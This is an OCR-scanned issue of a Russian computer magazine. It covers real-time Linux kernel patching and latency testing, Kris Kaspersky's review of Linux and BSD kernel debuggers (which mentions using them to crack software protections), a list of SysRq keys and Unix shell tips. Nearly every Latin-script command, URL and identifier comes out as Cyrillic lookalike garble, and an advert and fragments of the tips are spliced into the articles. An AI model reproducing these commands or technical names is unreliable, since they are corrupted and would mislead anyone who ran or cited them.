обновление системного времени (СІ_0СК5_РЕВ_5ЕС), отработка необхо- 
димых системных процессов, отложенных вызовов и алармов (посылка 
определенного сигнала процессу через запрашиваемое им время). 

Все эти тонкости использовались в различных патчах реализации 
Іоѵѵіаіепсу для ядра 2.4. Заменялись не только алгоритмы пересчета 
текущего приоритета, но и все возможные константы (например, предел 
пісе увеличивали до 256), кроме того, устанавливался таймер с частотой 
вплоть до 1 000 Н2. Пример та кого решения найдешь на странице 
ѵѵѵѵѵѵ.2Ір.сот.аи/~акрт/Ііпих/5сЬесІІаЕб1тІ . 

Для того чтобы указать на приложение, которое требует особого внима- 
ния со стороны процессора, можно использовать и заложенный в спе- 
цификации Р05ІХ геаИіте вызов 5СНЕ0_ЕІР0 (нечто вроде перехода в 
режим «мягкого» реального времени). Подобный результат достигается 
при использовании вызовов 5СНЕ0_ВВ, САР_ІРС_ЕОСК, САР_8У5_ЫІСЕ 
или через подмену значения 5у5_всЬесІ_де1:_ргіогі1:у_тах — функции, 
возвращающей максимальный геаі-ііте приоритет. Именно использова- 
ние 5СНЕ0_РІР0 приводит к тому, что проигрыватель хтгпв, запущенный 
под гоор практически не заикается даже при запредельных нагрузках на 
систему. 



$ зисіо гепісе --20 РІБ 

Кстати, уменьшить время отклика можно, отказавшись от использования 
утилиты Мрагт для дисковых устройств (исключение составляют случаи, 
когда предвидятся интенсивные операции ввода/вывода, например, об- 
работка аудио- или видеоданных). Так мы получим выигрыш в районе 2 мс. 
Текущий приоритет зависит от пісе и времени использования системных 
ресурсов. Он пересчитывается с каждым тиком и во время выхода из 
режима ядра. В разных системах это происходит по своим формулам, в 



^ ВЫГРУЖАЕМОЕ ЯДРО 

Основной проблемой геаі-бте является возможность захвата ресурсов у 
низкоприоритетного процесса, особенно если он выполняется в режиме 
ядра. Ведь даже на переключение контекста тратится некоторое время. 
Сотни разработчиков по всему миру пытались применить милиарды 
технологий: от возможности прерывания в ходе исполнения в ядерном 
режиме (ргеетрбЫе кегпеі, выгружаемое ядро) до временного насле- 
дования (іпбегіі) приоритета реального времени низкоприоритетным 
приложением, чтобы он мог поскорее закончить критический раздел кода 
и отдать управление. 
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Бестиковая система 



Латентность стандартного ядра 



Тема выгружаемого ядра заинтересовала общественность еще в период 
господства ветки 2.2. Л инус Торвальдс сказал, что геаі-ііте — пло- 
хая идея, и до поры ргеетрІіЫе реализовывалось исключительно с 
помощью патчей. Но уже при подготовке ветки 2.6 в исходный код была 
добавлена возможность сделать ядро выгружаемым (РНЕЕМРТ_РТ). 
РгеетрЛЫе-кегпеІ реализуется, как правило, в виде второго ядра. Если 
процесс обращается к нему с запросом, основная система фактически 
блокируется на время его выполнения. Исполняется все это в виде 
загружаемого модуля, который подменяет/перехватывает наиболее 
критичные функции, способные привести кзадержкам. Но не всетак 
просто. В своем интервью один из инженеров МопіаѴізіа (компании- 
разработчика одного из геаі-ііте решений на базе Бі п их) заявил, 
что в ядре 2.6 около 1 1 000 участков кода просто невозможно сделать 
ргеетрІіЫе. 

В интернете, если хорошенько поискать, можно найти достаточное 
количество разнообразных патчей, позволяющих реализовать режим 
реального времени в І_іпих, но, как правило, большая часть проектов 
уже устарела и предлагает изменения кядру2.4. Например, КІІРТ-І_іпих 
( ѵѵѵѵѵѵ.іис.ки.еби/кигі: ) и ПТ-І_іпих [ \л/\л/\л/.гШпих.огд ]. Оба Линукса исполь- 
зуют похожие технологии, и субъективно отличий в их работе незамет- 
но, но в интернете хвалят всекомунеленьименно РТ-І_іпих. Найти 
компьютеры под его управлением можно на генераторах «Токамак», в 
больницах Перу, на спутниках ЫАБА и в симуляторах Б1 1 1 -С. Кстати, 
если в ІбЬипіи ввести зибо арі-сасбе зеагсб геаі-ііте, то ты обнаружишь 
наличие пакета со старой 3.1 ргеЗ-З версией НТ-Ыпих. 

^ ПАТЧИМ ЯДРО 

Для тестирования задержек следует использовать специальные ути- 
литы. В Сети можно найти несколько решений. Например, Іаіепсуіезі 
( ѵѵѵѵ\л/.аагбепа.пеі/Ьеппо/Ііпих/Іаіепсѵіе5і-0.42-рпа.іаг.а2 І. которая 
разрабатывалась как раз для измерения общих задержек при обработ- 
ке мультимедийных данных во время различных потрясений, которые 
могут возникнуть на обычном десктопе (загрузка процессора сложными 
вычислениями; трудоемкие операции ввода/вывода: запись, копирова- 
ние, считывание файла размером 350 Мб; вывод большого количества 
графики; доступ к системе процессов /ргос с обновлением через 0,01 с). 
Эта утилита считается уже устаревшей, зато вся информация выводит- 
ся с помощью наглядных графиков, что оченьудобно при сравнении 
результатов. К современным бенчмаркам можно отнести гі-іезі ( гі.ѵѵікі. 
кегпеі.огд ) и рі_іезіз [ реорІе.гебЬаі.сот/ѵѵіІІіатз І. 

На стандартном ядре запускаем утилиту гі-іезі, только запустив, мы 
получаем значение 0,1 25 м с, при увеличении нагрузки оно возрастает 
до 1 5,402 мс. Следует обратить внимание на параметр Сгііегіа, который 
равен 1 00 микросекундам. В нашем случае результат теста — РАІІ_, то есть 



до геаі-ііте еще далеко. Ставим Іоѵѵіаіепсу-ядро — обычное ядро, но с 
таймером 1 000 Н2 и уменьшенным временем отклика: 

$ зисіо арС-деР іпзбаіі Ііпих-ІсжІаЦепсу 

Перезагружаемся и запускаем гі-іезі еще раз. 

$ зисіо гЦ-ЦезЦ аіі 

Стартовое значение латентности теперь равно 0,073 мс, а максимальное 

— 2,907 мс. Уже лучше. Хотя Сгііегіа по-прежнему РАІІ_, но музычка в 
Атагок’е при приличной загрузке системы больше не прерывается. 

Из всех решений по реализации системы реального времени до сегод- 
няшнего дня дошлотолько одно, предлагаемое Инго Молнаром. Ходили 
слухи о том, что выпускаемые им патчи ( ѵуууѵѵ.кегпеІ.ога/риЬ/Ііпих/кегпеІ/ 
ргоіесіз/гі ) будут включены в ядро 2.6.22, но пока этого не случилось. Для 
установки гі поклонникам Ребога достаточно ввести ушп іпзіаіі кегпеі-гі, 
остальным придется немного покомпилировать. Качаем и применяем 
патч к своему ядру: 

$ ѵ7деД — с ммтѵ. кегпеі. огд/риЪ/Ііпих/кегпеІ/ргобесбз/гб/ 
оІйег/раДсІі-2 .6.22. 1-гС9 
$ Саг х;і ѵб Ііпих-2 .6.22.1. Саг .Ьг2 
$ ссі Ііпих-2 .6.22.1 

$ зисіо раСск -р1 < . . /раСск-2 .6.22. 1-гС9 
$ шаке теписопбід 

При конфигурировании обнаружится ряд дополнительных параметров. 
Среди нихТіскІезз Бузует (Оупатіс Тіскз] (ЫО_Н2) — динамически 
изменяемый тик; И ід И Резоіиііоп ТітегБиррогі (НІ6Н_НЕ5_ТІМЕР5) 

— таймер высокого разрешения, почитать о нем можно здесь — ѵѵѵѵѵѵ. 
Ііпих5ѵтро5Іит.ога/2006/Ііпих5ѵтро5Іит ргосѵі .рбб В секции 
Ргеетрііоп Мобе нас интересует Сотріеіе Ргеетрііоп (Реаі-Тіте) 
(РРЕЕМРТ_РТ), хотя доступны еще Ыо Рогсеб Ргеетрііоп (Бегѵег) 
(РРЕЕМРТ_МОЫЕ), Ѵоіипіагу Кегпеі Ргеетрііоп Юезкіор) (РРЕЕМРТ_ 
ѴОШІЧТАРѴ), РгеетрІіЫе Кегпеі (І_о\л/-І_аіепсу йезкіор) (РПЕЕМРТ_ 
ОЕБКТОР). В секции «Віоск Іауег — Оеіаиіі 1/0 зсбебиіег» появился 
планировщик полностью справедливой очереди СР5. 

После перезагрузки системы, введя бтезд, можно увидеть, что ядро 
стало РПЕЕМРТ_РТ, таймер часов работает нестабильно («Сіоскзоигсе 
ізс ипзіаЫе»), а рз аих показывает наличие большого числа новых про- 
цессов. Но нас больше интересует результат работы гі-іезі. Так вот все 
наши ухищрения привели к тому, что максимальное значение латентнос- 
ти теперь не превышает 0,07 мс. Вуаля, тест пройден! цц 
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Зашити свою 
игровую систему 
надежно! 
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• система охлаждения процес- 
сора ОетіпІІ спасет процес- 
сор (ІпІеІ/АМй) от перегрева в 
самый ответственный момент 

• блок питания ВеаІ Роѵѵег Рго 
мощностью 1000 Вт справится 
с максимальными нагрузками, 
обеспечив стабильную работу 
на самых высоких разрешениях 

• корпус Зіаскег 832 надежно 
защитит компоненты игровой 
системы от механических и 
температурных повреждений 




Зашита Аля Игр! 

Настоящая игровая система без надлежащего охлаждения рас- 
плавится в считанные часы, оставив после себя бесформенную 
массу из пластика и металла на полу, клубы едкого дыма в ком- 
нате, а если не повезет, то и черные несмываемые пятна на обоях. 

Сооіег Мазнет — закаленный временем боец с температурами, 
знает, как не допустить печальных последствий поломки игровой 
системы от температурных излишков, предлагая три важных 
предмета, которые спасут систему от напастей: систему охлажде- 
ния процессора, блок питания и корпус. 



МОСКВА: ПИРИТ - 785-55-54, Арбайт компьютера — 725-80-08, Зеон — 955-51-99, 
ИП Котов — 784-72-34, доб. Д-13, НИКС — 974-33-33, ОЛАНД — 788-19-18, Санрайз — 
542-80-70, Сеть компьютерных магазинов Неоторг — 223-23-23, СтартМастер — 785-85-55, 
ЩЕДРИН — 784-72-34, РОВМ02А — 234-21-64, С5М Сотриіегз — 540-91-88, МЕРШИ — 
981-84-84, N1 Сотриіег — 970-19-30; ВОРОНЕЖ: РЕТ — 77-93-39; ИРКУТСК: Комтек — 
25-83-38; НИЖНИЙ НОВГОРОД: 5ЦМВІ5Е — 19-44-62; САНКТ-ПЕТЕРБУРГ: Компьютер-Центр 
КЕЙ — 074, Компьютерный Мир — 333-00-33; УФА: Сеть магазинов КламаС — 91-21-12 





Объединенная розничная сеть РОІ-АПІ5 и Техмаркет Компьютере: (495) 755-55-57 



Товар сертифицирован 





КРИС КАСПЕРСКИ 



Яде рная физика 



для начинающих 



ОБЗОР НИКСОВЫХ ОТЛАДЧИКОВ ЯДЕРНОГО УРОВНЯ 



Отладчиков уровня ядра под никсы — море, но дельных среди них крайне мало, и нужно 
быть нереально крутым хакером, чтобы сразу выбрать такой дебаггер, с которым мож- 
но действительно отлаживать, а не мучиться. Перепробовав кучу отладчиков, мыщъх 
решил составить внятный обзор, рассказывающий, чем один отладчик отличается от 
другого и какой из них звездный, а какой должен отправиться в треш. 



ля І_іпих существует великое множество интегрированных 
отладчиков, но ни один из них не включен в основную ветвь 
ядра, что выглядит странно, если не сказать подозрительно, 
особенно если учесть, что в хВ50-системы ядерный отладчик 
входит изначально (правда, поумолчанию он задизейблен, и его активация 
требует перекомпиляции ядра]. Причина состоитвтом, что Линус Тор- 
вал ьдс (до сих пор стоящийу руля и принимающий решение о включении 
тех или иных компонентов в ядро) не доверяет интерактивным отладчикам 
и считает, чтоу «правильных» программистов потребностей в них просто 
не возникает. Типа, есть же отладочная печати (смотри тап ргіпік), вотей и 
пользуйтесь. 

Однако с Торвальдсом согласны далеко не все разработчики, и в опреде- 
ленных ситуациях без дебаггера не обойтись, особенно если приходится 
отлаживать чужие модули, поставляемые без исходных текстов, или ломать 
защиты, противостоящие отладчикам прикладного уровня. Так что хочет 
того Торвал ьдс или нет, но «термоядерные» отладчики для І_іпих все-таки 
есть, причем практически все они распространяются в исходных текстах и 
не требуют де не г. Казалось бы, какая проблема — скачал, поставил, запус- 
тил... Междутем проблемы есть. Это и плохая совместимость неофициаль- 
ных отладчиков с различными версиями официальных ядер, и сложность 
выбора хорошего отладчика из кучи заброшенных проектов. Ситуация 



усугубляется тем, что различные отладчики предназначены для реше- 
ния разных задач, и потому на вопрос «Какой ядерный отладчик самый 
лучший?» даются диаметрально противоположные ответы, зачастую без 
всяких пояснений! Ну и какая польза оттаких советов?! 

г ТИПЫ ОТЛАДЧИКОВ 

Классические ядерные отладчики (как для *піх, так и для ѴѴіпсІоѵѵз) требуют 
наличия двух компьютеров. На одном из нихустанавливается отлаживае- 
мое ядро, а на другом — сам отладчик. Обмен данными обычно осуществля- 
ется по последовательному порту через нуль-модем, хотя можно встретить 
и другие варианты. Такие отладчики называются удаленными, и к ним, в 
частности, относится знаменитый дбЬ (клиентская часть). Другая часть 
отладчика находится непосредственно в ядре, и, если еетам нет (а в Ыпих’е 
ее нет), у нас ничего не получится. Очевидный недостатокудаленных отлад- 
чиков — необходимость приобретения второго компьютера, что далеко не 
всегда приемлемо (особенно для «домашних» хакеров]. Хотя виртуальные 
машины в какой-то мере снижают остроту этой проблемы. 

Локальные отладчики выгодно отличаются тем, что позволяют отлаживать 
ядро на одной машине с отладчиком. Чаще всего они работа ют только в 
текстовом режиме. Поддержка консоли в графическом режиме (не говоря 
уже об Х’ах] требует специальных агентов, работающих далеко не везде и не 
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всегда, а потому в ряде случаев приходится прибегать кудаленной отладке. 
Конструктивно отладчики могутбыть реализованы либо как неофициаль- 
ный патч ядра (требующий перекомпиляции последнего), либо как драйвер, 
загружаемый в ядро «налету». Примером отладчиков первого типа служит 
КОВ, второго — біпісе. 

Однако, независимо от особенностей своей реализации, все біпих-отлад- 
чики страдаютхронической проблемой совместимости с ядрами, поскольку 
разработчики ядра не координируютсвои действия с разработчиками от- 
ладчиков, и потому дебаггеры поддерживают только фиксированный набор 
версий ядер, причем поддержка новых версий, как правило, происходите 
большим опозданием. Кстати, у хВ50 таких проблем нетвообще, поскольку 
ядерный отладчик разрабатывается (и поставляется) вместе с самим ядром. 

г ИСПОЛЬЗОВАНИЕ ОТЛАДОЧНЫХ ВОЗМОЖНОСТЕЙ ѴМЖАКЕ 

Начиная с версии 6.0 ПС2, в популярной виртуальной машине ѴМѵѵаге поя- 
вился механизм Песогб/Періау, позволяющий (помимо прочих возможно- 
стей) осуществлять удаленную ядерную отладку даже для тех операционных 
систем, которые поставляются без интегрированного отладчика: І_іпих, 
хВ50 с выключенным отладчиком, N1 ит.д. 

Просто добавляем в ѵтх-файл (описывающий конфигурацию виртуаль- 
ной машины) строку «сІеЬид5і:иЬ.ІІ5Іеп.дие5І32=1» (или «беЬидЗіиЫізіеп. 
диезі64=1 2» для 64-разрядных платформ). После этого в файле ѵтѵѵаге.іод 



появляется следующая запись: «ѴМѵѵаге ѴѴогкзіаііоп із Іізіепіпд ІюгбеЬид 
соппесбоп оп рог* 8832», означающая, что виртуальная машина слушает 
порт 8832, с которым готова общаться по дбЬ- протоколу. Остается запустить 
сам дбЬ, приконнектиться к порту и приступить к отладке безо всяких танцев 
с бубном, без наложения заплаток, без перекомпиляции ядра и без загрузки 
специальных драйверов/модулей. 

ОтладчикдбЬ может быть запущен как на хосте (основной операционной 
системе), так и на соседней виртуальной машине. Для отладки нам потребу- 
ется два комплекта ядер. Одно — установленное на отлаживаемой системе, 
и другое — установленное на машине (реальной или виртуальной), где ра- 
ботает дбЬ. Отлаживаемое ядро может быть сжато и пострипано, а вот ядро 
для дбЬ в обязательном порядке должно быть без компрессии и желательно 
с отладочной информацией. Крометого, необходимо, чтобы версии обоих 
ядер совпадали, а файл Бузует. тар был в наличии. 

Пример работы с дбЬ представлен ниже: 

ОТЛАДКА ЯДРА І_ШІІХПОДѴМѴѴАКЕ 

# Запускаем дсІЪ 
% дсІЬ 

# Указываем путь к несжатому 32 -битному ядру 
(ддЪ) бііе ѵшІіпих-2 . 4 . 69-27 . ЕЬ . ЪеЪид 



Изменение файла конфигурации ядра РгееВБО для подключения отладчика йОВ 




# Либо к несжатому 64 -битному ядру 
(дбЪ) бііе ѵш1іпих-2 . 6 . 96-17 . ЕЬ . ЪеЪид 

# При необходимости переводим дсІЪ в 6 4 -разрядный режим 
(дсІЪ) зеб агсЪібесбиге І386 :х86-64 

# Коннектимся к отлаживаемому ядру 
(дсІЪ) багдеб гешобе ІосаІЪозб : 8832 

# Все! С этого момента можно начинать отладку ядра. 

Естественно, ядро, запущенное на эмуляторе, видиттолько виртуаль- 
ное железо. Исключение составляют 115 В -устройства, жесткие диски и 
сетевые карты, к которым ѴМѵѵаге предоставляет прямой доступ, однако, 
например, отладить драйвер видеокарты таким образомуже не получится. 

Н ИСПОЛЬЗОВАНИЕ ОТЛАДОЧНЫХ ВОЗМОЖНОСТЕЙ ОЕМО 

Эмулятор ОЕМЪ (іаЬгісе.ЬеІІагбігее.іт/дегпи) также позволяет отлаживать 
ядра без интегрированных отладчиков, но, в отличие от ѴМѵѵаге, он беспла- 
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тен и распространяется вместе с исходными текстами. Пример командной 
строки, реализующей форсированную отладку, приведен ниже: 

ОТЛАДКА ЯДРА иішх БЕЗ ИНТЕГРИРОВАННОГО 
ОТЛАДЧИКА ПОД ОЕМЫ 

# Запускаем ОЕМІІ с ядром, которое мы собираемся отлажи- 
вать 

$ дети -кегпеі /ЬооР/ЪгІтд -аррепсі «гооР=/беѵ/1ісІа» -зЬб- 
ѵда -т 256т -з -Ь.ба Ъсісі.ітд & 

# Запускаем дсІЪ на основной машине и коннектимся на порт 
1234 

$ д аъ 

(дсЗЬ) багдеб гетобе ІосаІЪозД : 1234 

# Подключаем образ ядра (должен совпадать с отлаживаемым 
ядром) 

(д<5Ъ) Іііе ѵтііпих 

г ыоѵеы- иыих керыеь оевіи50ек сыько) 

На сегодняшний день ЫІ_К0 является, пожалуй, самым продвинутым и 
мощным ядерным отладчиком для І_іпих, поддерживающим как локальную, 
так и удаленную отладку. К другим его достоинствам можно отнести бес- 
платность и наличие исходных текстов. Однако он работаеттолько с 51ІЗЕ 
ІЫпих Епіегргізе 5егѵегѵ9 5Р1/5Р2 итребуетперекомпиляции ядра, что 
является существенным недостатком, ограничивающим область его при- 
менения. Зато Ы1_К0 имеет документированный расширяемый интерфейс 
плагинов и свободно работает как в текстовом, так и в графическом режиме. 
Скачать последнюю версию отладчика (вместе с документацией) можно по 
ссылке: 1югде.поѵеІЕсогп/тобиІе5/х1 : тоб/рго)есѴ?пІксІ. 

^ ОТЛАДЧИК КйВ 

КйВ — самый популярный ядерный отладчик для І_іпих-систем. Распро- 
страняется в исходных текстах на бесплатной основе. Доступен по адресу 
озз.зді.сот/ргоіесІз/ксІЬ. Реализован в виде патча для ядра версий 2. [234]. 
Его установка происходит следующим образом: 

$ сб /изг/згс/ііпих 
$ рабсЬ -рі < ~/кбЬ-ххх 
$ таке теписопбід 

Активируем флаги С0І\ІРІ6_К0В и С0МРІ6_РРАМЕ_Р0ІЫТЕР, перекомпи- 
лируем ядро и радуемся жизни. 

КйВ поддерживаетлокальный и удаленный режимы отладки и работает 
на процессорах семейства х86 и ІА64, однако во время локальной отладки 
имеетбольшие проблемы с различными графическими режимами и 



некоторыми контроллерами клавиатур, что не есть хорошо. Поэтому в ряде 
случаев использование Ы1_К0 оказывается все же предпочтительнее. 
Переход в текстовый режим осуществляется по комбинации <АИ-СМ- 
Р 1 > , а возвращение — по < АІІ-СігІ- Р7> . Клавиша <Раизе> вызывает 
всплытие локальной консоли отладчика (аналог < Сігі- 0 > в ЗоШСЕ), 
позволяя нам просматривать память, устанавливать точки останова, 
дизассемблировать машинный код и т.д. Одним словом, практически все 
как в ЗоЙІСЕ. Воттолько КйВ не предоставляет возможности отладки на 
уровне исходных текстов, что является существенным недостатком для 
обычных разработчиков, но нас, хакеров, совершенно не волнует, по- 
скольку, если бы у нас были исходные тексты, разве бы мы стали часами 
торчать в отладчике?! 

0 ОТЛАДЧИК КОйВ 

Читая обзоры, можно подумать, что КбйВ (кдсІЫіпБуБзоЙ.сот) — это кон- 
курент или альтернатива КОВ. Ріа самом деле это не так. КбйВ представ- 
ляет собой интегрированный отладчик удаленного (не локального!) типа, 
поддерживающий несколько версий ядер: от2.4.6 до 2.6.0 и работающий на 
платформах І386, х86_64, РРС и 5390. Устанавливается он путем наложения 
патча ядра с последующей перекомпиляцией. К60В реализуеттолько 
серверную часть, а в качестве клиента обычно используется дбЬ или другой 
отладчик, поддерживающий его нуль-модемный протокол. 

Если на удаленной машине (там, где находится дбЬ) положить ядро, отком- 
пилированное с отладочной информацией (ключ ’-д'), мы получим отладку 
на уровне исходных текстов, обеспечиваемую средствами дбЬ, но отнюдь не 
КОйВ, как утверждаете я в некоторых руководствах. 

г ОТЛАДЧИК ЫЫІСЕ 

Ыпісе (\лллдл/.[іпісе.сот) представляет собой своеобразную пародию на ЗоИ- 
ісе под І_іпих, конструктивно реализованную как загружаемый модуль ядра, 
не требующую ни наличия второй машины, ни перекомпиляции, что дает 
ему 1 00 очков вперед. К сожалению, у Ыпісе имеется множество проблем. 
Например, не поддерживаются ядра >=2.6.9 и видеорежимы 5ирег-Ѵ6А, 
ітате-ЬиНег. 

Тем не менее Ыпісе вполне пригоден для хакерства, особенно если 
необходимо что-то быстро сломать, а времени/желания/возможности 
перекомпиляции ядра у нас нет. Однако следует помнить, что по своим 
функциональным возможностям Ыпісе — самый бедный отладчик из всех 
рассмотренных выше, и потому для серьезного хакинга все-таки лучше 
поставить Ы1_К0 или КОВ. 

г ЯДЕРНАЯ ОТЛАДКА В ХВЗБ-СИСТЕМАХ 

ЯдрохВЗО-систем включает в себя интегрированный отладчик по имени 
ОйВ, поддерживающий как локальную, так и удаленную отладку. По умол- 
чанию ядро собирается без отладчика, и, чтобы исправить эту вопиющую 
несправедливость, следует добавить строку «орбопз ОРВ» в файл конфигу- 
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Мне обзор понравился. Я, 
конечно, обо всех програм- 
мах знал, но пользовался 



А мне обзор не 
понравился. Я 
ничего не петрю 



рации ядра (который обычно находится в/изг/згс/зуз/іЗВб/сопіУбЕМЕРІС) и 
произвести перекомпиляцию. 

Вызывать отладчик можно различными путями. Если в приглашении 
загрузчика указать Ьооі -б, мы попадем в 00В на самой ранней стадии 
загрузки ядра, до начала распознавания и подключения устройств, что 
очень полезно для отладки драйверов. А вотесли хочется взломать какую- 
нибудь программу, то для вхождения в 00В с консоли (кактекстовой.так и 
графической] достаточно отдать команду зузсН беЬид.егйег_беЬиддег=ббЬ 
или (если в конфигурационном файле обозначена опция орбопз ВВЕАК_ 

Т0 0ЕВ1100ЕР) нажать на сСМ-АІІ-Езо. 

При наличии второй машины можно осуществить удаленную отладку, 
если возможностей локальной вдруг окажется недостаточно (мне трудно 
представить такую ситуацию, но чего вжизни не случается). Согласно 
официальной документации по РгееВБй, для этого нам понадобится две 
копии ядра: одна — установленная на отлаживаемой системе (постри- 
панная), другая — удаленная, которая должна быть откомпилирована с 
отладочной информацией и размещена в одном каталоге с дбЬ. Кроме 
того, версии ядер должны совпадать. Кстати, в качестве удаленной сис- 
темы не обязательно использовать именно РгееВЕй. Пригодна любая 
система, под которую имеется портдбЬ (например, І_іпих или даже ЫТ), 
главное — залить на нее копию ядра и загрузить ее в дбЬ через команду 
біе. 

Ріо, прежде чем запускать д б Ь, необходимо соединитьобе машины СОМ- 
шнурком, причем в файле конфигурации ядра потребуется исправить 
строку, отвечающую за параметры этого порта (она находится в строке 
«беѵісе зіох», гдех — номер последовательного порта, если считать от нуля], 
уставив флаги в значение 0x80. 



Включаем отлаживаемую машину. В командной строке загрузчика 
набираем Ьооі -б, чтобы остановить загрузку системы и войти в 
отладчик. Включаем удаленную машину и пишем в командной строке 
дбЬ - к кегпеі. (или же кдбЬ кегпеі при использовании КОйВ), где 
кегпеі — имя файла ядра. Цепляемся отладчиком к последователь- 
ному порту, набрав следующую команду: Іагдеі гетоіе /беѵ/сиааО, 
где сиааО — первый последовательный порт. После этого возвра- 
щаемся к отлаживаемой машине (которая находится в состоянии 
ожидания загрузки внутри ОйВ) и говорим дбЬ, сообщая системе, что 
мы передаем бразды правления удаленному отладчику дбЬ. Вернуть 
управление обратно можно при помощи той же самой команды дбЬ, 
фактически представляющей собой триггер между локальным и 
удаленным режимом отладки. 

^ ЗАКЛЮЧЕНИЕ 

Разумеется, мы описали далеко не все существующие ядерные отладчики 
итак и не выяснили, какой же из них все-таки самый лучший. Но ведь от- 
ладчик— это не религия. Использование нескольких отладчиков — вполне 
нормальное явление. 

Лично мыщъх предпочитаеттакую стратегию: если ломаемая программа 
запускается под РгееВВй 4.5 (любимая версия мыщъх’а], то задейс- 
твуется ООВ, если же нет, то загружается виртуальная машина с 5и5Е 
І_іпих, где установлен ЫІ_ОК. Под остальными системами приходится 
использовать К60В, соединенный с соседней виртуальной машиной, 
на которой запущен дбЬ. А Ыпісе у меня используется в основном для 
несложных экспериментов, например для наблюдения за руткитами и 
прочей малварью-ТГ 



Магические 

ЗузКщклавиши 

Ядро Ііпих, начиная с версии 2.2, поддерживает ряд магических комби- 
наций клавиш, вызываемых по < А1і-5у5Кщ-Кеу> , где < Кеу > — маги- 
ческая клавиша. Магические клавиши полезны для отладки и борьбы 
с малварью (например, клавиша <к> убивает все процессы в текущей 
консоли) . 

• <г> — отключение сырого клавиатурного ввода; 

• <к> — процедура Зесиге Ассезз Кеу (сокращенно 5АК), убивающая все 
процессы в текущей виртуальной консоли; 

• <Ъ> — немедленная перезагрузка без размонтирования дисков; 



• <с> — создание сгазМшпр’а, пригодного для последующего анализа; 

• <о> — нормальный шатдаун системы; 

• <5> — сброс дисковых кэшей для всех смонтированных томов; 

• <и> — перемонтирование всех томов с правами только на чтение; 

• <р> — отображение содержимого регистров процессора; 

• <1> — отображение текущего списка процессов; 

• <т> — отображение использования памяти; 

•<0> — < 9 > — установка уровня отладочного вывода ргішк; 

• <е> — посылка сигнала 5ІСТЕКМ всем процессам, кроме іпіі:; 

• <і> — посылка сигнала ЗЮКІЬЬ всем процессам, кроме іпіі; 

• <1> — посылка сигнала ЗІСКІЬЬвсем процессам, включая тй; 

• <Ь> — вывод списка магических ЗузБйрклавиш 

Полный перечень магических клавиш может быть получен по следующей 
ссьшкеімплд/ул^еІаЮ.ипзѵѵ.еби.аи/ІхгАоигсе/ПоситеШагіопДузщ.Іхі:. 
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АНДРЕЙ МАТВЕЕВ 

/ АЫОП(І5НОСК@ПЕАІ_.ХАКЕР.П1І / 

■ПР8^’ІШСК8 



трюки и советы юниксоиду 



Представляем твоему вниманию очередную подборку различных трюков, рекомендаций и 
советов, касающихся *піх-систем. 



01 



Маленький скрипт для запуска терминалки гхѵі с 
разными картинками в качестве бэкграунда: 

# I /Ьіп/зЬ. 
гип_гхѵб ( ) 

{ 

зЪібб $ ( (КАЫБОМ%$#) ) 

ехес ігхѵб -ріхіпар ~/ жа11рарегз/$1 

} 

гип_гхѵб '1з ~/ жаіірарегз/ ' 
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Чтобы всегда иметь под рукой системный 
журнал, имеет смысл в -/.хзеззіоп или —/.хіпіігс 
добавить вызов: 
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В 2 зб есть встроенное средство для приведе- 
ния имен файлов к нижнему/верхнему регистру 
(Іоѵѵегсазе/иррегсазе): 



бог і іп * ( . 


) ; тѵ $і 


${і: 


бог і іп * ( . 


) ; тѵ $і 


$ {І 
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Утилиту Іезз можно научить читать заархивиро- 
ванныетекстовые файлы (например, Іезз кегпеі- 
ЬоѵѵІю.М.ді), и вот каким способом: 

$ ѵі -/Іеззріре . зЬ 
#! /Ьіп/зЬ. 
сазе "$1" іп 

* . 2 ) ипсошргезз -с $1 2>/сІеѵ/пи11 



$ Іупх -аибЬ=1одіп:раззѵгогсІ 
Ьббр: //192 . 168 . 1 . 1/Збабиз .Ьіш \ 
-сіитр | зесі "1,/ШШ/сІ" I \ 
аѵік -Г : ' /ІР Асісігезз/ {ргіпб $2 } ' 



ю 



Сортировка файла /е1с/ра5зѵѵс1 по первой букве 
поля комментариев, где обычно хранится ФИО 
пользователя: 

% зогб -к : — к 5 /ебс/раззѵгсі 



іі 



С помощью команды аі можно сэмулиро- 
вать работу сгопІаЬ и Ьаісб (например, в том 
случае, когда администратор ограничил к ним 
доступ): 



хбегт - 1 з -деотебгу 80x5+45+705 \ 
-гѵ -зЬ -паше "Зузбет Іодг" \ 
-бп 5x7 -Т "Зузбет Іодг" \ 

-е баіі -б /ѵаг/іод/шеззадез & 



оз 



С помощью нехитрого скрипта 5\л/ар_1одз 
журнальные записи можно резервировать и 
обнулять каждый день: 

# ѵі /гооб/сгоп/зѵ7ар_1одз 
# ! /Ъіп/зЬ 

ср /ѵаг/іод/шеззадез /ѵаг/іод/ 
теззадез . 'сіабе +%сі-%т-%у_%Т' 
саб /сіеѵ/пиіі >/ѵаг/1од/шеззадез 

# сЬшосі +х /гооб/сгоп/зУ7ар_1одз 

# сгопбаЬ -е 

59 23 * * * 

/гооб/сгоп/зѵ?ар_1одз 
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Быстро закомментировать в файле -/ргостаіі. 
соп{ 20 строктекста, начиная, скажем, с 
третьей строки, можно с помощью следующей 
команды: 

$ ѵі -/ргостаіі . сопб 
: 3 , 20з/ Л /# / 



*.д т.) дипгір -с $1 2>/сІеѵ/пи11 
езас 

$ сЪтосІ +х -/Іеззріре . зЬ 
$ ехрогб ЬЕЗЗОРЕЫ ^ ' I -/Іеззріре . зЬ. %з' 
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Простейший калькулятор на базе связки 
командного интерпретатора и языка аѵѵк (вызов: 
саіс (12+7)*2/4): 

$ ѵі ~/ . гзЬгс 
бипсбіоп _са1с () { 

аѵгк "ВЕСІЫ { ргіпб $* ; }" 

} 

аііаз са1с="под1оЪ _са1с" 
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Вообще говоря, с помощью аѵѵк можно выполнять 
самые разные операции, например, подсчиты- 
вать объем файлов в текущем каталоге: 

% 1з -1 I амк 'ВЕСШ{а=0} {іб 
(іп<іех($1 , "сі" ) == 0) а=а+$5 } 

ЕЫБ {ргіпб а} ' 



09 



Внешний ІР-адрес домашнего роутера Ыпкзуз 
можно получить с помощью такого запроса: 



(сгопбаЬ) % аб -б <файл сценария> тж + 
1 сіау 

(ЪабсЬ) % аб -д Ъ -ш пом 



12 



Комбинация команд для быстрого переключения 
между двумя процессами: 

% Ъд; бд %- 



13 



Заключить все строки из файла біепате в скобки 
и перенаправить вывод в пеѵѵбіепате: 

% зесЗ ' з / . * / (&) Г бііепате > 
пеѵ^бііепаше 



14 



Поменять все слова УЕ5 на N0: 

# зесі 'з/УЕЗ/Ш/д' /ебс/гс.сопб > 
/ебс/гс . сопб . Іосаі 



15 



Удалить из файла все пустые строки, а также 
строки, содержащие только пробелы или 
табуляторы: 

% зесі ' / л [_<ТАВ>] *$/сР бііепате > 
